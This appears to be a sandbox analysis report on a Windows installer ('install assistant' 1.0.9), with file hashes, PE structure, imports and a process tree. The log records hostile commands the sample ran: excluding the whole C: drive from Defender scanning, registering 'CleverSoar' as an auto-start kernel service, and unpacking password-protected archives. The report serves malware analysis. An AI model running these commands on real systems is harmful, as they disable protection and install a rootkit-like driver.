                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3598848
                              Entropy (8bit):7.004949099807939
                              Encrypted:false
                              SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                              MD5:1D1464C73252978A58AC925ECE57F0FB
                              SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                              SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                              SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                              Malicious:false
                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3366912
                              Entropy (8bit):6.530548291878271
                              Encrypted:false
                              SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                              MD5:9902FA6D39184B87AED7D94A037912D8
                              SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                              SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                              SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                              Malicious:true
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                              Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3366912
                              Entropy (8bit):6.530548291878271
                              Encrypted:false
                              SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                              MD5:9902FA6D39184B87AED7D94A037912D8
                              SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                              SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                              SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                              Malicious:true
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:ASCII text, with CRLF, CR line terminators
                              Category:dropped
                              Size (bytes):406
                              Entropy (8bit):5.117520345541057
                              Encrypted:false
                              SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                              MD5:9200058492BCA8F9D88B4877F842C148
                              SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                              SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                              SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                              Malicious:false
                              Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.921220316367972
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 98.04%
                              • Inno Setup installer (109748/4) 1.08%
                              • InstallShield setup (43055/19) 0.42%
                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                              File name:#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                              File size:5'707'684 bytes
                              MD5:ff430c30f7b9f0550f6b68dcc709c55b
                              SHA1:a47d3d79a05d232d45aadd14045765521cfd8431
                              SHA256:6a11d0ca2303bffe42e568f32c1adefd70742379ce2639f2ee2a437051ac9c13
                              SHA512:44cc03072673a2a2953899e75f0445d11cb3a005a4dd43091ab2fac27517ab2661562dca1a4b96c515d2a7c33d56b91fea5c98e2b7e5cbf3d1134ca69eb6da0b
                              SSDEEP:98304:XwREoZqR+RuRmr4qNb1R088uArvgOv5EcNQ+DidMwZgf:lvRz1qNz/ts
                              TLSH:3A461213F2CBE43EF0591B3715B2B15895FB6A606823AE1696ECB4ACCF350601D3E647
                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                              Icon Hash:0c0c2d33ceec80aa
                              Entrypoint:0x4a83bc
                              Entrypoint Section:.itext
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:1
                              File Version Major:6
                              File Version Minor:1
                              Subsystem Version Major:6
                              Subsystem Version Minor:1
                              Import Hash:40ab50289f7ef5fae60801f88d4541fc
                              Instruction
                              push ebp
                              mov ebp, esp
                              add esp, FFFFFFA4h
                              push ebx
                              push esi
                              push edi
                              xor eax, eax
                              mov dword ptr [ebp-3Ch], eax
                              mov dword ptr [ebp-40h], eax
                              mov dword ptr [ebp-5Ch], eax
                              mov dword ptr [ebp-30h], eax
                              mov dword ptr [ebp-38h], eax
                              mov dword ptr [ebp-34h], eax
                              mov dword ptr [ebp-2Ch], eax
                              mov dword ptr [ebp-28h], eax
                              mov dword ptr [ebp-14h], eax
                              mov eax, 004A2EBCh
                              call 00007F1745391855h
                              xor eax, eax
                              push ebp
                              push 004A8AC1h
                              push dword ptr fs:[eax]
                              mov dword ptr fs:[eax], esp
                              xor edx, edx
                              push ebp
                              push 004A8A7Bh
                              push dword ptr fs:[edx]
                              mov dword ptr fs:[edx], esp
                              mov eax, dword ptr [004B0634h]
                              call 00007F17454231DBh
                              call 00007F1745422D2Eh
                              lea edx, dword ptr [ebp-14h]
                              xor eax, eax
                              call 00007F174541DA08h
                              mov edx, dword ptr [ebp-14h]
                              mov eax, 004B41F4h
                              call 00007F174538B903h
                              push 00000002h
                              push 00000000h
                              push 00000001h
                              mov ecx, dword ptr [004B41F4h]
                              mov dl, 01h
                              mov eax, dword ptr [0049CD14h]
                              call 00007F174541ED33h
                              mov dword ptr [004B41F8h], eax
                              xor edx, edx
                              push ebp
                              push 004A8A27h
                              push dword ptr fs:[edx]
                              mov dword ptr fs:[edx], esp
                              call 00007F1745423263h
                              mov dword ptr [004B4200h], eax
                              mov eax, dword ptr [004B4200h]
                              cmp dword ptr [eax+0Ch], 01h
                              jne 00007F1745429F4Ah
                              mov eax, dword ptr [004B4200h]
                              mov edx, 00000028h
                              call 00007F174541F628h
                              mov edx, dword ptr [004B4200h]
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              .rsrc0xcb0000x110000x11000a38d03cb2f026a0f99883dd9fce161dbFalse0.18785903033088236data3.7213085960795746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                              RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                              RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                              RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                              RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                              RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                              RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                              RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                              RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                              RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                              RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                              RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                              RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                              RT_STRING0xd8e000x3f8data0.3198818897637795
                              RT_STRING0xd91f80x2dcdata0.36475409836065575
                              RT_STRING0xd94d40x430data0.40578358208955223
                              RT_STRING0xd99040x44cdata0.38636363636363635
                              RT_STRING0xd9d500x2d4data0.39226519337016574
                              RT_STRING0xda0240xb8data0.6467391304347826
                              RT_STRING0xda0dc0x9cdata0.6410256410256411
                              RT_STRING0xda1780x374data0.4230769230769231
                              RT_STRING0xda4ec0x398data0.3358695652173913
                              RT_STRING0xda8840x368data0.3795871559633027
                              RT_STRING0xdabec0x2a4data0.4275147928994083
                              RT_RCDATA0xdae900x10data1.5
                              RT_RCDATA0xdaea00x310data0.6173469387755102
                              RT_RCDATA0xdb1b00x2cdata1.1590909090909092
                              RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                              RT_VERSION0xdb2980x584dataEnglishUnited States0.2804532577903683
                              RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                              DLLImport
                              kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                              comctl32.dllInitCommonControls
                              user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                              oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                              advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                              NameOrdinalAddress
                              __dbk_fcall_wrapper20x40fc10
                              dbkFCallWrapperAddr10x4b063c
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              No network behavior found

                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:23:06:59
                              Start date:22/12/2024
                              Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
                              Imagebase:0xec0000
                              File size:5'707'684 bytes
                              MD5 hash:FF430C30F7B9F0550F6B68DCC709C55B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:23:06:59
                              Start date:22/12/2024
                              Path:C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
                              Imagebase:0x160000
                              File size:3'366'912 bytes
                              MD5 hash:9902FA6D39184B87AED7D94A037912D8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:23:07:00
                              Start date:22/12/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Imagebase:0x7ff6e3d50000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:23:07:00
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:23:07:00
                              Start date:22/12/2024
                              Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
                              Imagebase:0xec0000
                              File size:5'707'684 bytes
                              MD5 hash:FF430C30F7B9F0550F6B68DCC709C55B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:false

                              Target ID:6
                              Start time:23:07:01
                              Start date:22/12/2024
                              Path:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203E2,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
                              Imagebase:0x330000
                              File size:3'366'912 bytes
                              MD5 hash:9902FA6D39184B87AED7D94A037912D8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:7
                              Start time:23:07:04
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:23:07:04
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:23:07:04
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:10
                              Start time:23:07:04
                              Start date:22/12/2024
                              Path:C:\Program Files (x86)\Windows NT\7zr.exe
                              Wow64 process (32bit):true
                              Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                              Imagebase:0x460000
                              File size:831'200 bytes
                              MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:11
                              Start time:23:07:04
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:12
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Program Files (x86)\Windows NT\7zr.exe
                              Wow64 process (32bit):true
                              Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                              Imagebase:0x460000
                              File size:831'200 bytes
                              MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:13
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:14
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:15
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:16
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:17
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff717f30000
                              File size:496'640 bytes
                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:19
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:21
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:22
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:23
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
